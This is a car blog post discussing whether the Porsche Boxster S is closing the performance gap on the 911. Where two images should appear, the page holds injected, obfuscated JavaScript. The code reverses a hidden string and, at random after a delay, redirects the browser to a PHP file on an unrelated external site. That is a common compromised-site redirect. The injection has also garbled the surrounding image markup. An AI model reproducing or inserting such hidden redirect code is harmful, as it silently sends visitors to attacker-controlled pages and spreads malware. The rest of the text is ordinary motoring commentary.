Porsche Boxster S. Dubai, UAE. The Die Is Cast

Moreover, at Porsche the 911 may be the linchpin – the company’s very DNA – but that doesn’t stop innovations and new technology filtering down into the design stages of lower range company models. A bonus from an industry standpoint certainly, but in some respects a double-edged sword. One wonders given the strength of the new 991 for instance, just how much there is left to improve after five decades of honing and perfecting (there’s even talk that the next 911 will be mid-engined!). Its smaller brethren meanwhile, with years of 911-technology and know-how still to incorporate, simply continue to close the gap.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/IMG_8127.jpg” width=”728″ height=”485″ />

This in itself raises another point. Given its place in the Porsche sportscar pecking order, it remains to be seen just how much extra potential there is residing in the Boxster S, or indeed any of the performance machines on Porsche’s lower rungs. Can you imagine, for example, what the sprightly mid-range Cayman could do with the 991’s 395hp 3.8l flat-six bolted down in the back? Wandering into 911 performance territory would be the ultimate backfire for Porsche, but the theory that the Boxster S may be closer to doing so than its production model suggests is an intriguing one.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/IMG_8118.jpg” width=”728″ height=”485″ />

All of which has got us thinking at crankandpiston. The 911 will always be more powerful, sportier and more direct than the Boxster. That’s just the way it is. But we’re intrigued to see where the line in the sand has now been drawn, and just how far the difference in performance is between the two.

The 911 versus the Boxster, one-on-one. We’ve thrown down the gauntlet Porsche. How keen are you to pick it up?
